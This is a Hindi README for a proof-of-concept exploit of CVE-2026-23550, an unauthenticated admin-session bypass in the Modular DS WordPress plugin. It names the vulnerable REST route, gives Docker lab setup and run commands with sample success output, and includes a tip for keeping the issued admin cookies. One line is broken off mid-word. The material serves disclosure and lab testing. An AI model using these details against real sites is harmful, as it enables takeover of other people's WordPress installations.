
CVE-2026-23550 - Modular DS WordPress प्लगइन **अप्रमाणित व्यवस्थापक पहुंच**
प्रूफ-ऑफ-कॉन्सेप्ट (PoC) जो CVE-2026-23550 को प्रदर्शित करता है - Modular DS WordPress प्लगइन (संस्करण ≤2.5.1) में गंभीर अप्रमाणित एडमिन खाता अधिग्रहण। वास्तविक दुनिया में सक्रिय रूप से शोषित।

हमले का सारांश: /api/modular-connector/login में दोषपूर्ण REST API रूटिंग जब होता है तो WordPress प्रमाणीकरण को बायपास कर देता है, जिससे अप्रमाणित एडमिन सत्र कुकीज़ प्रदान होती हैं।
origin=mo# प्रोडक्शन-रेडी PoC
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued
प्रभावित REST एंडपॉइंट केवल ?rest_route= तंत्र के माध्यम से सुलभ है; /wp-json/ के माध्यम से सीधी पहुंच उपलब्ध नहीं हो सकती है। यह भेद्यता बिना क्रेडेंशियल या नॉन्स सत्यापन के अप्रमाणित पहुंच की अनुमति देती है। WordPress एडमिनिस्ट्रेटर सत्र कुकी का सफल जारी होना शोषण की पुष्टि माना जाता है। यह प्रूफ-ऑफ-कॉन्सेप्ट कोई प्रशासनिक कार्रवाई नहीं करता है। परीक्षण के दौरान Modular DS संस्करण 2.5.0 का उपयोग किया जाता है।
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
प्रतीक्षा करें: "ready for connections"
curl http://localhost:8080/?rest_route=/
अपेक्षित:
{
"name": "...",
"namespaces": [...]
}
यदि यह विफल होता है → रुकें, वातावरण टूटा हुआ है।
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
नोट: यदि आप कुकीज़ को टेक्स्ट फ़ाइल में चाहते हैं तो poc.sh फ़ाइल से "rm -f "$COOKIE_JAR"" हटा दें।
MIT लाइसेंस - केवल सुरक्षा अनुसंधान और अधिकृत पेंटेस्टिंग के लिए। दुर्भावनापूर्ण उपयोग के लिए नहीं। जिम्मेदारी से खुलासा करें।
यह PoC केवल अधिकृत सुरक्षा परीक्षण के लिए है। प्रोडक्शन सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है। निष्कर्षों की सूचना प्लगइन अनुरक्षकों को दें।